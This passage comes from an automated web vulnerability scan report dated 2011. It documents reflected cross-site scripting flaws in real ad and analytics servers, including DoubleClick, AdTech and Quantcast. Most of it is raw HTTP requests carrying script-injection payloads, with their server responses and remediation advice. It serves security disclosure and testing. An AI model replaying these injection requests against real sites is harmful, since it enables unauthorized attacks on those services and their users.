Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 01:44:11 GMT
Expires: Sun, 13 Feb 2011 01:44:11 GMT
2.33. http://ad.doubleclick.net/adj/quotes.nasdaq.com/_default [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/quotes.nasdaq.com/_default
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb82a'-alert(1)-'25fbef87c9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/_default;tile=1;;abr=!webtv;key=value;sz=88x31;ord=%7B740396577399224000%7D?&eb82a'-alert(1)-'25fbef87c9e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/asp/NasdaqSymLookup2.asp?mode=stock
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 02:06:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c86f'-alert(1)-'3f3882b7aa2 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/icu_oh;tile=6c86f'-alert(1)-'3f3882b7aa2 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/asp/summaryquote.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 545
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 02:08:05 GMT
Expires: Sun, 13 Feb 2011 02:08:05 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37f6"><script>alert(1)</script>43f9462365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframef37f6"><script>alert(1)</script>43f9462365/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cf1"><script>alert(1)</script>6f6a1cff5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.089cf1"><script>alert(1)</script>6f6a1cff5c/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ec2"><script>alert(1)</script>c0a20453787 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/523528ec2"><script>alert(1)</script>c0a20453787/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4743"><script>alert(1)</script>6e260f872e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606c4743"><script>alert(1)</script>6e260f872e4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887be"><script>alert(1)</script>d3fdf2880b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0887be"><script>alert(1)</script>d3fdf2880b5/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 879ef"><script>alert(1)</script>d3642495e1a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154879ef"><script>alert(1)</script>d3642495e1a/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d715b"><script>alert(1)</script>cb98fdd4e27 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECHd715b"><script>alert(1)</script>cb98fdd4e27;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34d59"><script>alert(1)</script>eccfe2120c7 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=00000134d59"><script>alert(1)</script>eccfe2120c7 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
2.43. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe/3.0/5235/1131606/0/154/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c02"><script>alert(1)</script>017374d66f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&d9c02"><script>alert(1)</script>017374d66f8=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dca6"><a>3b74bcc7161 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css1dca6"><a>3b74bcc7161/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 13 Feb 2011 01:36:32 GMT
Content-Length: 7762
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95845<a>160ebdce2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css95845<a>160ebdce2c/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 13 Feb 2011 01:36:33 GMT
Content-Length: 7753
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> css95845<a>160ebdce2c ie6.css</em> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b184a"><a>e278f378478 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie6.cssb184a"><a>e278f378478 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 13 Feb 2011 01:36:35 GMT
Content-Length: 17486
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d6e7<a>91e331edfde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css3d6e7<a>91e331edfde/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 13 Feb 2011 01:36:33 GMT
Content-Length: 7756
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> css3d6e7<a>91e331edfde ie7.css</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c8f"><a>a95366bad4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css93c8f"><a>a95366bad4/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 13 Feb 2011 01:36:32 GMT
Content-Length: 7759
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a365"><a>5d4b90c6e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie7.css4a365"><a>5d4b90c6e67 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Sun, 13 Feb 2011 01:36:35 GMT
Content-Length: 17482
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 484cc<a>c4af98fcd6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css484cc<a>c4af98fcd6c/screen-optimized.css?v=2011021312 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:05 GMT
Connection: close
Content-Length: 7819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> dynamic-css484cc<a>c4af98fcd6c screen-optimized.css</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceeb2"><a>22d4f861d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-cssceeb2"><a>22d4f861d9/screen-optimized.css?v=2011021312 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:00 GMT
Connection: close
Content-Length: 7822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b4d"><a>6756d908ee5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css/screen-optimized.css41b4d"><a>6756d908ee5?v=2011021312 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:09 GMT
Connection: close
Content-Length: 7825
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 147b1<a>d42ee9bbe47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css/screen-optimized.css147b1<a>d42ee9bbe47?v=2011021312 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
